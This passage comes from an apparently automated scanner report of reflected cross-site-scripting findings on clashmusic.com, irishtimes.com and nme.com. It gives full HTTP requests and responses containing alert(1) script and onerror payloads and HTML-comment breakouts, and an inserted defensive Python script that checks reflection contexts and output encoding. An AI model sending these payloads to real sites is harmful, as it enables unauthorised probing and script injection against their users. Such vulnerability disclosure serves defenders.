Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user register8d93b"><img src=a onerror=alert(1)>477a08ade76 register8d93b">
...[SNIP]...

3.110. http://www.clashmusic.com/user/register [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/register

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 247ec--><img%20src%3da%20onerror%3dalert(1)>1bb9b0fc8a9 was submitted in the REST URL parameter 2. This input was echoed as 247ec--><img src=a onerror=alert(1)>1bb9b0fc8a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /user/register247ec--><img%20src%3da%20onerror%3dalert(1)>1bb9b0fc8a9 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:09:03 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:09:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div id="clash-sponsor" class="not-front not-logged-in user register247ec--><img src=a onerror=alert(1)>1bb9b0fc8a9 register247ec-->
...[SNIP]...

3.111. http://www.clashmusic.com/user/register [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/register

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25d85"><a>f589e38414a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/register?25d85"><a>f589e38414a=1 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:08:15 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user register register sidebar-right" id="page-user-register?25d85"><a>f589e38414a=1">
...[SNIP]...

3.112. http://www.irishtimes.com/newspaper/mostread/pagelog.cfm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.irishtimes.com
Path:   /newspaper/mostread/pagelog.cfm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 81131<script>alert(1)</script>ed085a3f4e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newspaper/mostread/pagelog.cfm81131<script>alert(1)</script>ed085a3f4e5?action=1&arturl=/newspaper/theticket/2011/0506/1224296203710.html&md5hash=7800ede9b7c5e8ab828a3aae5f1793bd&headline=Shakin%27%20Stevens&premium=1 HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=48949502.1304949673.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=48949502.1644454561.1304949660.1304949660.1304949660.1; __utmc=48949502; __utmb=48949502.1.10.1304949660

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:07:19 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Content-Length: 417

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 - Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
<P>The requested URL /newspaper/mostread/pagelog.cfm81131<script>alert(1)</script>ed085a3f4e5?action=1&arturl=/newspaper/theticket/2011/0506/1224296203710.html&md5hash=7800ede9b7c5e8ab828a3aae5f1793bd&headline=Shakin%27%20Stevens&premium=1 was not found on this server.</P>
...[SNIP]...

3.113. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.irishtimes.com
Path:   /newspaper/theticket/2011/0506/1224296203710.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bbade<a>55573ebf5a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /newspaper/theticketbbade<a>55573ebf5a8/2011/0506/1224296203710.html HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:00:56 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Content-Length: 267

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 - Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
<P>The requested URL /newspaper/theticketbbade<a>55573ebf5a8/2011/0506/1224296203710.html was not found on this server.</P>
...[SNIP]...

3.114. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.irishtimes.com
Path:   /newspaper/theticket/2011/0506/1224296203710.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 31bfb<script>alert(1)</script>d6f7f03e726 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newspaper/theticket/2011/050631bfb<script>alert(1)</script>d6f7f03e726/1224296203710.html HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:01:09 GMT
Server: Apache
Set-Cookie: AuthCookie_test=test; domain=.irishtimes.com; path=/
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Content-Length: 289

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 - Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
<P>The requested URL /newspaper/theticket/2011/050631bfb<script>alert(1)</script>d6f7f03e726/1224296203710.html was not found on this server.</P>
...[SNIP]...

3.115. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.irishtimes.com
Path:   /newspaper/theticket/2011/0506/1224296203710.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 98721<script>alert(1)</script>4401bc69c40 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newspaper/theticket/2011/0506/1224296203710.html98721<script>alert(1)</script>4401bc69c40 HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:01:10 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Content-Length: 289

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 - Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
<P>The requested URL /newspaper/theticket/2011/0506/1224296203710.html98721<script>alert(1)</script>4401bc69c40 was not found on this server.</P>
...[SNIP]...

3.116. http://www.nme.com/adcode/hot-spot.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nme.com
Path:   /adcode/hot-spot.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 5f92a-->a012285e929 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
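The following Python script is an added example, not part of the XSS.CX report and not code from any of the sites named in it. It uses the standard-library html.parser to classify where a reflected marker lands in a response (plain text between tags as in 3.114/3.115, or inside an HTML comment as in 3.116 through 3.119), performs the differential check that separates a "Firm" comment-context finding from a "Certain" one (did a new start tag appear?), and shows the encoding that keeps each context closed. The two response templates are reconstructions cut down from the bodies quoted in the report; the real server-side templates are not on the page.

```python
"""Added example (not part of the XSS.CX report): classify where a reflected
marker lands in an HTML response, and neutralise it for the two contexts the
irishtimes.com (3.114/3.115, text between tags) and nme.com (3.116-3.119,
inside an HTML comment) findings show.  The templates below are cut down from
the responses quoted in the report; the real server-side templates are not on
the page."""
import html
from collections import Counter
from html.parser import HTMLParser


class ContextParser(HTMLParser):
    """Records which parser context(s) MARKER shows up in, and every start tag seen."""

    def __init__(self, marker=None):
        super().__init__(convert_charrefs=True)
        self.marker = marker
        self.contexts = set()
        self.tags = []
        self._raw = None  # 'script' or 'style' while inside such an element

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if self.marker and any(value and self.marker in value for _, value in attrs):
            self.contexts.add("attribute")
        if tag in ("script", "style"):
            self._raw = tag

    def handle_endtag(self, tag):
        if tag == self._raw:
            self._raw = None

    def handle_data(self, data):
        if self.marker and self.marker in data:
            self.contexts.add(self._raw or "text")

    def handle_comment(self, data):
        if self.marker and self.marker in data:
            self.contexts.add("comment")


def parse(page, marker=None):
    p = ContextParser(marker)
    p.feed(page)
    p.close()  # flush buffered text so trailing data after a comment is classified
    return p


def reflection_contexts(page, marker):
    """Set of contexts ('text', 'comment', 'attribute', 'script', 'style') containing MARKER."""
    return parse(page, marker).contexts


def injected_tags(template, benign, payload):
    """Start tags present when PAYLOAD is rendered that are absent with a BENIGN value."""
    extra = Counter(parse(template.format(payload)).tags) - Counter(parse(template.format(benign)).tags)
    return dict(extra)


def text_safe(value):
    """Encoding for data placed between tags: < > & and quotes become character references."""
    return html.escape(value, quote=True)


def comment_safe(value):
    """Encoding for data placed inside <!-- -->: both terminators ('-->' and '--!>')
    need a '>', and '--' is itself disallowed in comment content."""
    return value.replace(">", "&gt;").replace("--", "- -")


# Reconstructed 404 body from 3.114 (irishtimes.com); '{}' is where the URL is echoed.
TEXT_TEMPLATE = (
    "<HTML><HEAD><TITLE>404 - Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>"
    "<P>The requested URL {} was not found on this server.</P></BODY></HTML>"
)
TEXT_PAYLOAD = "/newspaper/theticket/2011/050631bfb<script>alert(1)</script>d6f7f03e726/1224296203710.html"

# Reconstructed error comment from 3.116 (nme.com); '{}' is the echoed controller name.
COMMENT_TEMPLATE = (
    "<html><head><title>NME.COM</title></head><body>\n"
    "<!-- error: EXCEPTION_NO_CONTROLLER - Invalid controller specified ({}) -->\n"
    "</body></html>"
)
COMMENT_PAYLOAD = "adcode5f92a-->a012285e929"


if __name__ == "__main__":
    print("3.114 raw  :", reflection_contexts(TEXT_TEMPLATE.format(TEXT_PAYLOAD), "d6f7f03e726"),
          injected_tags(TEXT_TEMPLATE, "/x.html", TEXT_PAYLOAD))
    print("3.114 fixed:", injected_tags(TEXT_TEMPLATE, "/x.html", text_safe(TEXT_PAYLOAD)))
    print("3.116 raw  :", reflection_contexts(COMMENT_TEMPLATE.format(COMMENT_PAYLOAD), "a012285e929"))
    print("3.116 fixed:", reflection_contexts(COMMENT_TEMPLATE.format(comment_safe(COMMENT_PAYLOAD)), "a012285e929"))
```

For 3.116 the marker suffix a012285e929 is reported in the text context even though the template wrote it into a comment, which is exactly the break-out the scanner describes; after comment_safe() it stays in the comment context. For 3.114 injected_tags() reports the extra script start tag, and reports nothing once the echoed URL goes through text_safe().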

Request

GET /adcode5f92a-->a012285e929/hot-spot.html?spot=1&channel=news HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1045; PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rsi_segs=; ipc_nme_core=1304949672; __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmb=112756251.2.10.1304949643; __utmc=112756251; __utmv=112756251.|1=Core=Y=1,; ipc_nme_last_visit=9

Response

HTTP/1.1 200 OK
Server: Apache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:05:22 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 631ed8fa777592278c3c121d623fe1939e0bd012"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3420"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0013279914855957"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:05:22 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:05:22 GMT
Connection: close
Set-Cookie: ignite_loggedin=false; expires=Wed, 08-Jun-2011 14:05:22 GMT; path=/; domain=.nme.com
Content-Length: 38330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
<!-- error: EXCEPTION_NO_CONTROLLER - Invalid controller specified (adcode5f92a-->a012285e929) -->
...[SNIP]...

3.117. http://www.nme.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nme.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 4623e-->5187d24571d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico4623e-->5187d24571d HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1045; PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rsi_segs=; ipc_nme_core=1304949672; __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmb=112756251.2.10.1304949643; __utmc=112756251; __utmv=112756251.|1=Core=Y=1,; ipc_nme_last_visit=9; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:07:08 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 95cbd9249f56d01c751526782057b0f9773659d7"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3720"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0014960765838623"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:07:08 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:07:08 GMT
Connection: close
Set-Cookie: ignite_loggedin=false; expires=Wed, 08-Jun-2011 14:07:08 GMT; path=/; domain=.nme.com
Content-Length: 38335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
<!-- error: EXCEPTION_NO_CONTROLLER - Invalid controller specified (favicon.ico4623e-->5187d24571d) -->
...[SNIP]...

3.118. http://www.nme.com/hotspot/channel/news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nme.com
Path:   /hotspot/channel/news

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b0c83-->8f638c4fb79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /hotspotb0c83-->8f638c4fb79/channel/news HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1045; PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmc=112756251; __utmb=112756251.2.10.1304949643; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache
Pragma: no-cache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:06:55 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 71377e3929ad2c9d7c33f66221ca8d2eecc2c7e2"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 23|[{"Type":"LOG"},"cs: "]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 23|[{"Type":"LOG"},"ic: "]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3480"]|
X-Wf-1-1-1-8: 30|[{"Type":"LOG"},"mu: 4456448"]|
X-Wf-1-1-1-9: 39|[{"Type":"LOG"},"ts: 0.14782190322876"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 09 May 2011 14:06:56 GMT
Date: Mon, 09 May 2011 14:06:56 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 38328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
<!-- error: EXCEPTION_NO_CONTROLLER - Invalid controller specified (hotspotb0c83-->8f638c4fb79) -->
...[SNIP]...

3.119. http://www.nme.com/news/sufjan-stevens/56527 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nme.com
Path:   /news/sufjan-stevens/56527

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3224f-->39280491a0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news3224f-->39280491a0b/sufjan-stevens/56527 HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Pragma: no-cache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:00:53 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: d61b71039b6d7937222aa72b09ebd0b3767435a0"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 23|[{"Type":"LOG"},"ic: "]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3720"]|
X-Wf-1-1-1-8: 30|[{"Type":"LOG"},"mu: 4456448"]|
X-Wf-1-1-1-9: 39|[{"Type":"LOG"},"ts: 0.22853589057922"]|
